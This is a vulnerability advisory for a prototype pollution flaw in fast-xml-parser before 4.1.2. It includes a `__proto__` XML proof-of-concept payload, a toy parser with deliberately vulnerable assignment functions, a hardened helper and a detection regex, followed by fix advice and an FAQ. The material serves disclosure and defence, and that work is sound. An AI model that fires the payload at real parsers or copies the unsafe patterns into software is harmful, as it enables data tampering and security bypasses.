CVE-2023-26920: Medium severity NaturalIntelligence Fast Xml Parser vulnerability
Impact
Before the fix, an XML document that used `__proto__` as a tag or attribute name could write into the prototype of the object returned by the parser. Attacker-controlled values then show up on the parsed result (or, depending on how the parser merges keys, on every object in the process) without appearing as own properties, which is a prototype pollution vulnerability.
```js
const { XMLParser, XMLBuilder, XMLValidator } = require("fast-xml-parser");

// Proof of concept: the tag name "__proto__" is used as a property key by the parser.
let XMLdata = "<__proto__><polluted>hacked</polluted></__proto__>";

const parser = new XMLParser();
let jObj = parser.parse(XMLdata);

console.log(jObj.polluted); // on versions before 4.1.2 this prints "hacked"
```
Patches
The problem has been patched in v4.1.2.
Workarounds
If upgrading is not possible, check the XML string for `__proto__` before passing it to the parser and reject documents that contain it.
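The following is an added example, not code from fast-xml-parser or from the advisory author. It uses a deliberately tiny XML-to-object converter (elements and text only; no attributes, namespaces, entities or self-closing tags, all assumptions of this illustration) to show why a tag named `__proto__` is dangerous whenever a parser assigns `obj[tagName] = value` on a plain object: with a straight assignment the prototype of the result is swapped, so `tree.polluted` reads `"hacked"` while `Object.keys(tree)` is empty; with a hypothetical "merge repeated tags" policy the write lands in `Object.prototype` and every object in the process is affected. It also implements the pre-parse string check from the Workarounds section and a hardened assignment helper. The function and variable names are this example's own.

```javascript
// Tokenize a flat XML string into open tags, close tags and text.
// Assumption: well-formed input with no attributes (illustration only).
function tokenize(xml) {
  const tokens = [];
  const re = /<\/([^>\s]+)\s*>|<([^>\s\/]+)\s*>|([^<]+)/g;
  let m;
  while ((m = re.exec(xml)) !== null) {
    if (m[1] !== undefined) tokens.push({ type: "close", name: m[1] });
    else if (m[2] !== undefined) tokens.push({ type: "open", name: m[2] });
    else if (m[3].trim() !== "") tokens.push({ type: "text", value: m[3].trim() });
  }
  return tokens;
}

// Build nested objects; a leaf element becomes its text, an element with
// children becomes an object keyed by child tag name. `assign` is the only
// place a tag name is used as a property key, so the defence lives there.
function buildTree(xml, assign) {
  const root = { obj: {}, text: null, hasChildren: false };
  const stack = [root];
  for (const tok of tokenize(xml)) {
    const top = stack[stack.length - 1];
    if (tok.type === "open") {
      stack.push({ name: tok.name, obj: {}, text: null, hasChildren: false });
      top.hasChildren = true;
    } else if (tok.type === "text") {
      top.text = tok.value;
    } else {
      const frame = stack.pop();
      const parent = stack[stack.length - 1];
      assign(parent.obj, frame.name, frame.hasChildren ? frame.obj : frame.text);
    }
  }
  return root.obj;
}

// Vulnerable policy 1: plain bracket assignment. obj["__proto__"] = value
// invokes the inherited __proto__ setter and replaces obj's prototype.
function unsafeAssign(obj, key, value) {
  obj[key] = value;
}

// Vulnerable policy 2 (hypothetical): merge into an existing key, as a parser
// might do for repeated sibling tags. obj["__proto__"] is Object.prototype,
// so the merge writes into the prototype shared by every object.
function mergeAssign(obj, key, value) {
  const existing = obj[key];
  if (existing !== null && typeof existing === "object" &&
      value !== null && typeof value === "object") {
    Object.assign(existing, value);
  } else {
    obj[key] = value;
  }
}

// Hardened policy: refuse __proto__ as a key, and define every other key as an
// own property so no inherited setter can ever run.
function safeAssign(obj, key, value) {
  if (key === "__proto__") throw new Error("refusing to use __proto__ as a property name");
  Object.defineProperty(obj, key, { value, enumerable: true, writable: true, configurable: true });
}

// Pre-parse check from the Workarounds section: __proto__ used as an element
// name or attribute name. A plain xml.includes("__proto__") is stricter and
// also acceptable; this version avoids rejecting the string in text content.
function containsProtoName(xml) {
  return /<\/?__proto__[\s>\/]|\s__proto__\s*=/.test(xml);
}

// Parse once with the given policy and report whether Object.prototype gained
// `probeKey`; the pollution is undone afterwards so the process stays clean.
function pollutesGlobally(xml, assign, probeKey) {
  const before = Object.prototype.hasOwnProperty.call(Object.prototype, probeKey);
  buildTree(xml, assign);
  const after = Object.prototype.hasOwnProperty.call(Object.prototype, probeKey);
  delete Object.prototype[probeKey];
  return !before && after;
}

// Constructed input mirroring the advisory's proof of concept.
const POC = "<__proto__><polluted>hacked</polluted></__proto__>";
const tree = buildTree(POC, unsafeAssign);
console.log(tree.polluted, Object.keys(tree)); // "hacked" [] : hidden from own-property checks
console.log(pollutesGlobally(POC, mergeAssign, "polluted")); // true : global pollution
console.log(containsProtoName(POC)); // true : the workaround catches it
```

The first policy is the one the advisory's `jObj.polluted` output corresponds to: the value is readable, but schema validators and `Object.keys`-based sanitizers that only look at own properties never see it. The second policy is what makes prototype pollution a process-wide problem rather than a per-object one, which is why rejecting the key at assignment time is preferable to relying on the string check alone.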
References
https://gist.github.com/Sudistark/a5a45bd0804d522a1392cb5023aa7ef7
Other sources
fast-xml-parser before 4.1.2 allows `__proto__` as a tag or attribute name, leading to prototype pollution.
Frequently Asked Questions
What is the severity of CVE-2023-26920?
The severity of CVE-2023-26920 is considered medium. It is a prototype pollution issue: crafted XML can place attacker-controlled properties on the parsed result (or on the shared Object prototype), but the advisory does not describe direct code execution.
How do I fix CVE-2023-26920?
To fix CVE-2023-26920, upgrade the fast-xml-parser package to version 4.1.2 or later.
What type of vulnerability is CVE-2023-26920?
CVE-2023-26920 is a prototype pollution vulnerability: the parser used untrusted tag and attribute names, including `__proto__`, as property keys on the objects it builds.
Which software versions are affected by CVE-2023-26920?
CVE-2023-26920 affects all versions of the fast-xml-parser package prior to version 4.1.2.
What are the potential impacts of CVE-2023-26920?
The potential impacts of CVE-2023-26920 include injecting properties that the application never set into parsed objects, bypassing checks that only inspect own properties, and, depending on how the polluted objects are used, manipulating application logic or data through crafted XML input.